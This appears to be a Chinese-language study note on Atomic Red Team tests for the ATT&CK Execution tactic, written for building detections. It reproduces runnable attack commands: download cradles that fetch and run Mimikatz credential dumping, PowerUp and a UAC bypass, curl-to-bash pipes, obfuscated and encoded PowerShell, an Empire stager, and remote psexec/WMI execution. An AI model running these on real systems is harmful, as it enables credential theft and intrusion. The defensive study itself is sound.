Atomic-执行战术
Atomic-执行战术
- 可以编入使用落实到安全策略且有效的战术编号
- 参考:
- https://atomicredteam.io/atomics/#execution
具体战术概览
execution
T1610
Deploy a container
T1609
Kubernetes Exec Into Container
T1569.002
System Services: Service Execution 系统服务
T1569.001
System Services: Launchctl 系统服务
T1559
Inter-Process Communication 进程间通信
T1559.002
Inter-Process Communication: Dynamic Data Exchange 进程间通信
T1204.003
User Execution: Malicious Image 用户执行
T1204.002
User Execution: Malicious File 用户执行
T1106
Native API 原生API (排除)
T1059.007
Command and Scripting Interpreter: JavaScript 命令解释器
T1059.006
Command and Scripting Interpreter: Python 命令解释器
T1059.005
Command and Scripting Interpreter: Visual Basic 命令解释器
T1059.004
Command and Scripting Interpreter: Bash 命令解释器
T1059.003
Command and Scripting Interpreter: Windows Command Shell 命令解释器
T1059.002
Command and Scripting Interpreter: AppleScript 命令解释器
T1059.001
Command and Scripting Interpreter: PowerShell 命令解释器
T1047
Windows Management Instrumentation Windows管理规范(WMI)
主机模型-系统服务
T1569.002
System Services: Service Execution 系统服务
T1569.001
System Services: Launchctl 系统服务
主机服务-系统服务-服务执行
1. 以服务启动的形式执行命令
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
sc.exe start ARTService
sc.exe delete ARTService
2. 使用 psexec 在远程主机上执行命令
psexec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"
3. 使用 Impacket psexec. py 脚本在远程主机上执行命令。
psexec.py 'domain/administrator:pxssw0rd1@127.0.0.1' 'whoami'
4. 使用勒索软件 BlackCat 特性在加密之前执行命令
cmd.exe /c "wmic csproduct get UUID"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
5. 使用 remcom 工具在远程主机上执行命令
remcom.exe \\localhost /user:administrator /pwd:Pxxword1 cmd.exe
6. 使用 Snake 恶意软件进行服务创建
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto
主机模型-系统服务-Launchctl
这个场景是针对 Macos 系统进行适配,跟 Linux 环境中的 systemd 是一个意思,可以使用 launchctl 管理 MacOS 服务。
launchctl submit -l #{label_name} -- #{executable_path}
本章不涉及 MacOS 相关测试适配。
主机模型-进程间通信
-
Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe
-
Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)
-
Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)
1. Cobalt Strike Artifact Kit pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
2. Cobalt Strike Lateral Movement (psexec_psh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
3. Cobalt Strike SSH (postex_ssh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
4. Cobalt Strike post-exploitation pipe (4.2 and later)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
5. Cobalt Strike post-exploitation pipe (before 4.2)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
目前情况无法很深入的检测主机底层的进程间通信,从外部检测只能做基础的关键字命令匹配,所以此处添加至匹配关键字的高级情报库即可。
namedpipes_executor. exe
主机模型-进程间通信-动态数据交换
根据细节操作,目前同样是无法检测,也无法通过关键字进行匹配检测。
主机模型-用户执行-恶意文件
参考下面链接吧,我看了下里面描述的这 11 种诱导或欺骗用户执行恶意文件都是较为复杂,如果检测需要从多维度操作,其中我发现一个很明显的特征,就是以命令行的形式执行各种下载恶意文件的同时执行恶意代码,就是说这种情况一般都有下载行为,只是使用哪种不同形式的命令去下载恶意文件。
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md
命令行下载特征记录
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
echo var url = "[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt], fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript %TEMP%\OSTapGet.js
Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
主机模型-用户执行-恶意镜像
这个其实跟上面阐述的用户执行-恶意文件是一样的,唯一的不同就是下载的文件改成了镜像文件而已。
命令行下载特征记录
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
主机模型-原生 API
发现里面执行的这些步第一个是通过 csc. exe 进行编译获得,另外 3 个就是使用 WinPwn 下载对应的 powershell 脚本并执行。
命令行下载特征记录
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
主机模型-命令与脚本解释器-Powershell
-
Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
-
Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
-
Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
1. 下载 powershell 版本 Mimikatz 并执行窃取凭据
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
- 下载并执行 Invoke-Mimikatz
2. 在本地磁盘种运行 BloodHound 内网渗透工具
- 简介
BloodHound 以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs 以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在 Red Team 面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使 Blue Team 成员对己方网络系统进行更好的安全检测及保证域的安全性。
BloodHound 通过在域内导出相关信息,在将数据收集后,将其导入 Neo4j 数据库中,进行展示分析。Neo4j 是一款 NOSQL 图形数据库,它将结构化数据存储在网络上而不是表中,Bloodhound 正是利用这种特性加以合理分析,可以更加直观的将数据以节点空间”来表达相关数据。
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
3. 使用 Download Cradle 让 Bloodhound 在内存中执行
- Download Cradles 是什么?
Download Cradles 是一句话的代码,主要功能是下载远程的额外的其他功能的恶意代码,并执行。
参考: http://wp.blkstone.me/2019/03/what-is-download-cradles/
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
4. 混淆测试
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
无法提取特征检测。
5. 使用 PsSendKeys 功能运行 Mimikatz
- 主要作用是通过 PsSendKeys 运行 mimikatz,执行后,将会自动执行文件资源管理器,记事本和输入代码的操作,最后将展示 mimikatz 转储信息。
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
6. 使用 Invoke-AppPathBypass 脚本绕过 UAC 限制执行命令
AppPathBypass-应用程序路径通过 Powershell 实现 UAC 绕过
参考:
https://zhuanlan.zhihu.com/p/29325846
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
7. 使用 Powershell MsXml COM object 加载 Download Cradle
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1)',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
8. 使用Powershell XML requests 加载 Download Cradle
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml)');$Xml.command.a.execute | IEX"
9. 使用 Powershell invoke mshta. exe 调用下载功能加载 Download Cradle
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()"
10. 通过 Powershell 直接使用 Invoke-DownloadCradle
用特权用户打开powershell然后执行Invoke-DownloadCradle.ps1
11. Powershell 无文件脚本执行
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
12. 运行低版本 Powershell 进行攻击
powershell.exe -version 2 -Command Write-Host $PSVersion
13. NTFS 备用数据流访问
Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
14. Powershell 会话创建与使用
New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
15. 使用ATHPowerShellCommandLineParameter 对参数进行变形来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop
16. 使用 ATHPowerShellCommandLineParameter 对参数进行变形和编码来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop
17. 使用ATHPowerShellCommandLineParameter 带入EncodedCommand 参数来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop
18. 使用 ATHPowerShellCommandLineParameter 带入 EncodedCommand 和 UseEncodedArguments 参数和来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop
19. 使用混淆的 Powershell 执行命令
powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
20. 使用 powershell 调用已知恶意的 Cmdlets
- 什么是 Cmdlets?
"Cmdlets" 指的是 PowerShell 中的命令类型。Cmdlet 全称为 "Cmdlet command",是 PowerShell 的一种命令类型,用于执行各种任务和操作。每个 Cmdlet 都代表一个特定的操作,并且具有特定的参数、选项和输出。
在 PowerShell 中使用 Cmdlets 可以帮助用户更快速、高效地完成各种任务,例如管理文件、目录和进程,访问网络资源,配置计算机设置等。Cmdlets 通常由 PowerShell 系统自带的或第三方开发人员编写的脚本文件提供,也可以自行编写。
在某种意义上,我们可以理解这个就是类似 python 中的能够实现某一类功能的库文件,使用的时候导入即可拿来调用,所以这里理解为存在很多 powershell 类型的恶意库。
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
特别记录这些恶意的 Cmdlets
"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
21. 从 PowerShellMafia脚本中调用 PowerUp 检查权限提升的途径
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
22. 滥用 nslookup 进行 DNS 查询
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
主机模型-命令与脚本解释器-AppleScript
Reference: https://github.com/EmpireProject/Empire
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
主机模型-命令与脚本解释器-Windows Command Shell
-
Atomic Test #3 - Suspicious Execution via Windows Command Shell
-
Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
-
Atomic Test #5 - Command Prompt read contents from CMD file and execute
1. 创建并执行批处理脚本
Start-Process $env:TEMP\T1059.003_script.bat
2. 将文本写入到文件并展示出来
echo "Hello from the Windows Command Prompt! " > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
3. 通过 Windows 命令行进行可疑的执行操作
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
4. 模拟 BlackByte 勒索软件进行打印轰炸
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p $env:temp\T1059_003note.txt" | out-null
5. 在命令行中读取内容并执行
cmd /r cmd<PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd
主机模型-命令与脚本解释器-Bash
1. 创建并执行shell脚本
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
2. 命令行下载 shell 脚本并通过管道执行
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
3. 收集 SUID 权限的可执行文件
chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
bash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
参考:
https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
4. 执行信息搜集工具 LinEnum
chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh
bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh
参考:
https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
5. 将脚本放入临时文件
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
6. 查询 shell 脚本执行的结果
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
7. 确认有哪些可用的 shell 环境
cat /etc/shells
8. 无文件执行 shell 脚本
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
9. 混淆命令行脚本
ART=$(echo -n "id" |base64 -w 0)
echo "\$ART=$ART"
echo -n "$ART" |base64 -d |/bin/bash
unset ART
10. 更改登录的 shell 环境
useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
11. 通过环境变量执行 shell 脚本
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/bash
12. 检测命名管道的shell
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
ls -la /tmp/art.txt
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt
主机模型-命令与脚本解释器-Visual Basic
1. 通过 VB 脚本收集本地计算机信息
cscript PathToAtomicsFolder\T1059.005\src\sys_info.vbs > $env:TEMP\T1059.005.out.txt
2. 将 VBS 代码进行编码后执行
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
3. 通过 VBA 提取内存中的信息
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
主机模型-命令与脚本解释器-Python
-
Atomic Test #1 - Execute shell script via python's command mode arguement
-
Atomic Test #3 - Execute Python via Python executables (Linux)
-
Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
1. 使用 Python 命令行参数模式执行 shell 脚本
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
2. 通过脚本py的形式执行python
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
3. 通过可执行文件的形式执行 python
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
4. 使用 Python 的 pyt 模块和 spawn 功能生成 bash 和 sh 环境
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
主机模型-命令与脚本解释器-JavaScript
-
Atomic Test #1 - JScript execution to gather local computer information via cscript
-
Atomic Test #2 - JScript execution to gather local computer information via wscript
1. 使用 cscript 调用 jscript 搜集本地计算机信息
cscript PathToAtomicsFolder\T1059.007\src\sys_info.js > $env:TEMP\T1059.007.out.txt'
2. 使用 wscript 调用 jscript 搜集本地计算机信息
wscript PathToAtomicsFolder\T1059.007\src\sys_info.js
主机模型-Windows 管理规范(WMI)
-
Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
-
Atomic Test #8 - Create a Process using obfuscated Win32_Process
1. 使用 WMI 侦察用户
wmic useraccount get /ALL /format:csv
2. 使用 WMI 侦察进程
wmic process get caption,executablepath,commandline /format:csv
3. 使用 WMI 侦察软件
wmic qfe get description,installedOn /format:csv
4. 使用 WMI 侦察远程主机列出服务信息
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
5. 使用 WMI 执行本地进程
wmic process call create notepad.exe
6. 使用 WMI 执行远程进程
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
7. 使用 WMI 查询和编码命令创建进程
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
8. 使用混淆的 Win32 进程创建一个进程
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("Win32_Atomic")
$NewClass.Put()
Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe
9. 使用 WMI 执行rundll32
wmic /node:127.0.0.1 process call create "rundll32.exe $env:TEMP\calc.dll StartW"
10. 使用 WMIC 卸载应用程序
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall